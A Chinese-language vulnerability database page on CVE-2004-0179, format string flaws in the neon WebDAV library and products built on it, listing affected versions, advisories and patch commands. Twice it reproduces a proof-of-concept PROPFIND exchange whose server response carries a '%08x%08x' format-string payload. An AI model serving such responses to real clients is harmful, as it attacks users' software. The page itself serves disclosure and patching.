CVE-2004-0179
CVSS5.1
发布时间 :2004-06-01 00:00:00
修订时间 :2016-10-17 22:41:29
NMCOEPS    

[原文]Multiple format string vulnerabilities in (1) neon 0.24.4 and earlier, and other products that use neon including (2) Cadaver, (3) Subversion, and (4) OpenOffice, allow remote malicious WebDAV servers to execute arbitrary code.


[CNNVD]Neon WebDAV Client库格式化字符串漏洞 (CNNVD-200406-036)

        (1) neon 0.24.4及其早期版本,和其他使用包含(2)Cadaver,(3)Subversion和(4)OpenOffice的neon产品存在格式化字符串漏洞。远程恶意WebDAV服务器可以执行任意代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:cadaver:cadaver_webdav_client:0.20.4
cpe:/a:cadaver:cadaver_webdav_client:0.20.5
cpe:/a:subversion:subversion
cpe:/a:neon:neon_client_library:0.19.3
cpe:/a:cadaver:cadaver_webdav_client:0.20.2
cpe:/a:cadaver:cadaver_webdav_client:0.22.0
cpe:/a:neon:neon_client_library:0.23
cpe:/a:cadaver:cadaver_webdav_client:0.20.3
cpe:/a:cadaver:cadaver_webdav_client:0.22.1
cpe:/a:neon:neon_client_library:0.23.4
cpe:/a:neon:neon_client_library:0.24.3
cpe:/a:neon:neon_client_library:0.23.3
cpe:/a:neon:neon_client_library:0.24.2
cpe:/a:cadaver:cadaver_webdav_client:0.20.0
cpe:/a:cadaver:cadaver_webdav_client:0.20.1
cpe:/a:cadaver:cadaver_webdav_client:0.21.0
cpe:/a:neon:neon_client_library:0.24
cpe:/a:neon:neon_client_library:0.23.8
cpe:/a:neon:neon_client_library:0.23.7
cpe:/a:openoffice:openoffice:1.1.2
cpe:/a:neon:neon_client_library:0.23.2
cpe:/a:neon:neon_client_library:0.24.1
cpe:/a:neon:neon_client_library:0.23.1
cpe:/a:neon:neon_client_library:0.23.6
cpe:/a:neon:neon_client_library:0.23.5
cpe:/a:neon:neon_client_library:0.24.4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10913Multiple format string vulnerabilities in (1) neon 0.24.4 and earlier, and other products that use neon including (2) Cadaver, (3) Subversio...
oval:org.mitre.oval:def:1065Multiple Format String Vulnerabilities in neon and Dependent Products
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0179
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0179
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-036
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040404-01-U.asc
(VENDOR_ADVISORY)  SGI  20040404-01-U
http://lists.suse.com/archive/suse-security-announce/2004-Apr/0002.html
(VENDOR_ADVISORY)  SUSE  SuSE-SA:2004:009
http://lists.suse.com/archive/suse-security-announce/2004-Apr/0003.html
(VENDOR_ADVISORY)  SUSE  SuSE-SA:2004:008
http://marc.info/?l=bugtraq&m=108213873203477&w=2
(UNKNOWN)  BUGTRAQ  20040416 [OpenPKG-SA-2004.016] OpenPKG Security Advisory (neon)
http://marc.info/?l=bugtraq&m=108214147022626&w=2
(UNKNOWN)  BUGTRAQ  20040416 void.at - neon format string bugs
http://security.gentoo.org/glsa/glsa-200405-01.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200405-01
http://security.gentoo.org/glsa/glsa-200405-04.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200405-04
http://www.debian.org/security/2004/dsa-487
(VENDOR_ADVISORY)  DEBIAN  DSA-487
http://www.mandriva.com/security/advisories?name=MDKSA-2004:032
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2004:032
http://www.redhat.com/support/errata/RHSA-2004-157.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:157
http://www.redhat.com/support/errata/RHSA-2004-158.html
(PATCH)  REDHAT  RHSA-2004:158
http://www.redhat.com/support/errata/RHSA-2004-159.html
(PATCH)  REDHAT  RHSA-2004:159
http://www.redhat.com/support/errata/RHSA-2004-160.html
(PATCH)  REDHAT  RHSA-2004:160
http://www.securityfocus.com/bid/10136
(UNKNOWN)  BID  10136
https://bugzilla.fedora.us/show_bug.cgi?id=1552
(PATCH)  FEDORA  FEDORA-2004-1552

- 漏洞信息

Neon WebDAV Client库格式化字符串漏洞
中危 格式化字符串
2004-06-01 00:00:00 2005-10-20 00:00:00
远程  
        (1) neon 0.24.4及其早期版本,和其他使用包含(2)Cadaver,(3)Subversion和(4)OpenOffice的neon产品存在格式化字符串漏洞。远程恶意WebDAV服务器可以执行任意代码。

- 公告与补丁

        The vendor has released an upgrade that deals with this issue.
        Gentoo has released an advisory (GLSA 200405-25:02). This advisory announces the release of a new tla eBuild to address the issues reported in this BID. Gentoo have recommended that tla users upgrade to tla current by issuing the following sequence of commands as a superuser:
        emerge sync
        emerge -pv ">=dev-util/tla-1.2-r2"
        emerge ">=dev-util/tla-1.2-r2"
        Gentoo have released an advisory (GLSA 200405-01). This advisory announces the release of a new neon eBuild to address the issues reported in this BID. Gentoo have recommended that Neon users upgrade to neon version 0.24.5 or later by issuing the following sequence of commands as a superuser:
        emerge sync
        emerge -pv ">=net-misc/neon-0.24.5"
        emerge ">=net-misc/neon-0.24.5"
        SGI has released an advisory 20040404-01-U and fixes to address this issue. Please see referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixes are linked below.
        Red Hat has released an advisory (RHSA-2004:157-06) and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.
        Redhat advisory RHSA-2004:158-01 along with fixes has been released dealing with this issue.
        SUSE has released an advisory SuSE-SA:2004:009 to address this and other issues. Please see the advisory for more information.
        Redhat advisory RHSA-2004:159-01 along with fixes has been released dealing with this issue. This advisory contains updated subversion packages. Please see the referenced advisory for more information.
        OpenPKG has released advisory OpenPKG-SA-2004.016 as well as a fix dealing with this issue. Please see the referenced advisory for more information, and below for the updated fix.
        Debian has released advisory DSA 487-1 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.
        Gentoo has released updates to address these issues, which may be applied with the following commands:
        # emerge sync
        # emerge -pv ">=net-misc/cadaver-0.22.1"
        # emerge ">=net-misc/cadaver-0.22.1"
        Netwosix has released an advisory LNSA-#2004-0012 with fix information to address these issues. Please see the referenced advisory for more information.
        Mandrake has released advisory MDKSA-2004:032 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.
        Red Hat has released advisory RHSA-2004:163-01 and fixes dealing with this issue for their affected OpenOffice packages for Red Hat Linux 9.0. Please see the attached advisory for more information and details on obtaining fixes.
        Gentoo has released an advisory (GLSA 200405-04) for OpenOffice, which uses the neon library. Please see the attached advisory for more information and details on obtaining fixes.
        Gentoo openoffice users on the x86 architecture should:
        # emerge sync
        # emerge -pv ">=app-office/openoffice-1.1.1-r1"
        # emerge ">=app-office/openoffice-1.1.1-r1"
        Gentoo openoffice users on the sparc architecture should:
        # emerge sync
        # emerge -pv ">=app-office/openoffice-1.1.0-r3"
        # emerge ">=app-office/openoffice-1.1.0-r3"
        Gentoo openoffice users on the ppc architecture should:
        # emerge sync
        # emerge -pv ">=app-office/openoffice-1.0.3-r1"
        # emerge ">=app-office/openoffice-1.0.3-r1"
        Gentoo openoffice-ximian users should:
        # emerge sync
        # emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
        # emerge ">=app-office/openoffice-ximian-1.1.51-r1"
        Red Hat Fedora has released advisory FEDORA-2004-103 dealing with these issues for their Fedora Linux project. Please see the referenced advisory for more information.
        Gentoo has released an advisory (GLSA 200406-03) providing fixes for sitecopy, which includes the vulnerable neon library. Fixes may be applied by the superuser with the following commands:
        emerge -pv unmerge net-misc/sitecopy
        emerge unmerge net-misc/sitecopy
        Mandrake Linux has released advisory MDKSA-2004:078 addressing this issue. Please see the referenced advisory for further information.
        The Fedora Legacy project has released advisory FLSA:1552 along with fixes to address this issue for RedHat Linux 7.3 and 9.0. Please see the referenced advisory for further information.
        RedHat Fedora Core1
        
        Neon Client Library 0.19.3
        

- 漏洞信息 (23999)

Neon WebDAV Client Library 0.2x Format String Vulnerabilities (EDBID:23999)
linux dos
2004-04-14 Verified
0 Thomas Wana
N/A [点击下载]
source: http://www.securityfocus.com/bid/10136/info 

It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.

Request
- -------

PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0

Response
- --------

HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked


<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">

<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/lenya/blog/authoring/entries/2003/08/24/peanuts/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>%08x%08x</D:status>
</D:propstat>
</D:response>

</D:multistatus>		

- 漏洞信息 (F33111)

vsa0401.html (PacketStormID:F33111)
2004-04-18 00:00:00
Thomas Wana  
advisory
CVE-2004-0179
[点击下载]

Format string bugs exist in neon versions 0.19.0 and below when ne_set_error is changed from taking a single char to taking printf-style varargs. Release 0.24.5 fixes this problem.

- 漏洞信息

5365
Neon Client Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Neon WebDAV Client Library Format String Vulnerabilities
Input Validation Error 10136
Yes No
2004-04-14 12:00:00 2009-07-12 04:06:00
Discovery of this issue is credited to Thomas Wana <greuff@void.at>.

- 受影响的程序版本

sitecopy sitecopy 0.13.4
sitecopy sitecopy 0.13.3
SGI ProPack 2.4
SGI ProPack 2.3
RedHat Linux 9.0 i386
RedHat Linux 7.3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 2.1
OpenOffice OpenOffice 1.1.52
OpenOffice OpenOffice 1.1.51
OpenOffice OpenOffice 1.1.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
OpenOffice OpenOffice 1.1.1
OpenOffice OpenOffice 1.1 .0
OpenOffice OpenOffice 1.0.3
OpenOffice OpenOffice 1.0.1
Netwosix Netwosix Linux 1.1
Netwosix Netwosix Linux 1.0
Neon Client Library 0.24.4
Neon Client Library 0.24.3
Neon Client Library 0.24.2
Neon Client Library 0.24.1
Neon Client Library 0.24
Neon Client Library 0.23.8
Neon Client Library 0.23.7
Neon Client Library 0.23.6
Neon Client Library 0.23.5
Neon Client Library 0.23.4
Neon Client Library 0.23.3
Neon Client Library 0.23.2
Neon Client Library 0.23.1
Neon Client Library 0.23
Neon Client Library 0.19.3
- Debian Linux 3.0 sparc
- Debian Linux 3.0 s/390
- Debian Linux 3.0 ppc
- Debian Linux 3.0 mipsel
- Debian Linux 3.0 mips
- Debian Linux 3.0 m68k
- Debian Linux 3.0 ia-64
- Debian Linux 3.0 ia-32
- Debian Linux 3.0 hppa
- Debian Linux 3.0 arm
- Debian Linux 3.0 alpha
- Debian Linux 3.0
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Gentoo Linux 1.2
Gentoo Linux 1.1 a
Gentoo Linux 0.7
Gentoo Linux 0.5
Cadaver WebDAV Client 0.22.1
Cadaver WebDAV Client 0.22
+ RedHat Linux 9.0 i386
Cadaver WebDAV Client 0.21
Cadaver WebDAV Client 0.20.5
Cadaver WebDAV Client 0.20.4
Cadaver WebDAV Client 0.20.3
Cadaver WebDAV Client 0.20.2
Cadaver WebDAV Client 0.20.1
Cadaver WebDAV Client 0.20
ArX Distributed Revision Control System 1.0.18
ArX Distributed Revision Control System 1.0.17
ArX Distributed Revision Control System 1.0 pre16
ArX Distributed Revision Control System 1.0 pre15
ArX Distributed Revision Control System 1.0 pre14
ArX Distributed Revision Control System 1.0 pre13
ArX Distributed Revision Control System 1.0 pre12
ArX Distributed Revision Control System 1.0 pre11
ArX Distributed Revision Control System 1.0 pre10
Neon Client Library 0.24.5
ArX Distributed Revision Control System 1.0.19

- 不受影响的程序版本

Neon Client Library 0.24.5
ArX Distributed Revision Control System 1.0.19

- 漏洞讨论

It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.

- 漏洞利用

It has been reported that the following XML request/response sequence will be sufficient to trigger this issue:

Request
- -------

PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0

Response
- --------

HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked


&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;D:multistatus xmlns:D="DAV:"&gt;

&lt;D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"&gt;
&lt;D:href&gt;/lenya/blog/authoring/entries/2003/08/24/peanuts/&lt;/D:href&gt;
&lt;D:propstat&gt;
&lt;D:prop&gt;
&lt;lp1:resourcetype&gt;&lt;D:collection/&gt;&lt;/lp1:resourcetype&gt;
&lt;D:getcontenttype&gt;httpd/unix-directory&lt;/D:getcontenttype&gt;
&lt;/D:prop&gt;
&lt;D:status&gt;%08x%08x&lt;/D:status&gt;
&lt;/D:propstat&gt;
&lt;/D:response&gt;

&lt;/D:multistatus&gt;

- 解决方案

The vendor has released an upgrade that deals with this issue.

Gentoo has released an advisory (GLSA 200405-25:02). This advisory announces the release of a new tla eBuild to address the issues reported in this BID. Gentoo have recommended that tla users upgrade to tla current by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=dev-util/tla-1.2-r2"
emerge ">=dev-util/tla-1.2-r2"

Gentoo have released an advisory (GLSA 200405-01). This advisory announces the release of a new neon eBuild to address the issues reported in this BID. Gentoo have recommended that Neon users upgrade to neon version 0.24.5 or later by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=net-misc/neon-0.24.5"
emerge ">=net-misc/neon-0.24.5"

SGI has released an advisory 20040404-01-U and fixes to address this issue. Please see referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixes are linked below.

Red Hat has released an advisory (RHSA-2004:157-06) and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Redhat advisory RHSA-2004:158-01 along with fixes has been released dealing with this issue.

SUSE has released an advisory SuSE-SA:2004:009 to address this and other issues. Please see the advisory for more information.

Redhat advisory RHSA-2004:159-01 along with fixes has been released dealing with this issue. This advisory contains updated subversion packages. Please see the referenced advisory for more information.

OpenPKG has released advisory OpenPKG-SA-2004.016 as well as a fix dealing with this issue. Please see the referenced advisory for more information, and below for the updated fix.

Debian has released advisory DSA 487-1 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.

Gentoo has released updates to address these issues, which may be applied with the following commands:
# emerge sync
# emerge -pv ">=net-misc/cadaver-0.22.1"
# emerge ">=net-misc/cadaver-0.22.1"

Netwosix has released an advisory LNSA-#2004-0012 with fix information to address these issues. Please see the referenced advisory for more information.

Mandrake has released advisory MDKSA-2004:032 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:163-01 and fixes dealing with this issue for their affected OpenOffice packages for Red Hat Linux 9.0. Please see the attached advisory for more information and details on obtaining fixes.

Gentoo has released an advisory (GLSA 200405-04) for OpenOffice, which uses the neon library. Please see the attached advisory for more information and details on obtaining fixes.

Gentoo openoffice users on the x86 architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.1-r1"
# emerge ">=app-office/openoffice-1.1.1-r1"

Gentoo openoffice users on the sparc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.0-r3"
# emerge ">=app-office/openoffice-1.1.0-r3"

Gentoo openoffice users on the ppc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.0.3-r1"
# emerge ">=app-office/openoffice-1.0.3-r1"

Gentoo openoffice-ximian users should:
# emerge sync
# emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
# emerge ">=app-office/openoffice-ximian-1.1.51-r1"

Red Hat Fedora has released advisory FEDORA-2004-103 dealing with these issues for their Fedora Linux project. Please see the referenced advisory for more information.

Gentoo has released an advisory (GLSA 200406-03) providing fixes for sitecopy, which includes the vulnerable neon library. Fixes may be applied by the superuser with the following commands:
emerge -pv unmerge net-misc/sitecopy
emerge unmerge net-misc/sitecopy

Mandrake Linux has released advisory MDKSA-2004:078 addressing this issue. Please see the referenced advisory for further information.

The Fedora Legacy project has released advisory FLSA:1552 along with fixes to address this issue for RedHat Linux 7.3 and 9.0. Please see the referenced advisory for further information.


Red Hat Fedora Core1

Neon Client Library 0.19.3

Cadaver WebDAV Client 0.22

Cadaver WebDAV Client 0.22.1

Neon Client Library 0.24

Neon Client Library 0.24.1

Neon Client Library 0.24.2

Neon Client Library 0.24.3

Neon Client Library 0.24.4

ArX Distributed Revision Control System 1.0 pre16

ArX Distributed Revision Control System 1.0 pre11

ArX Distributed Revision Control System 1.0 pre10

ArX Distributed Revision Control System 1.0 pre13

ArX Distributed Revision Control System 1.0 pre15

ArX Distributed Revision Control System 1.0 pre12

ArX Distributed Revision Control System 1.0 pre14

ArX Distributed Revision Control System 1.0.17

ArX Distributed Revision Control System 1.0.18

OpenOffice OpenOffice 1.1.2

SGI ProPack 2.3

SGI ProPack 2.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站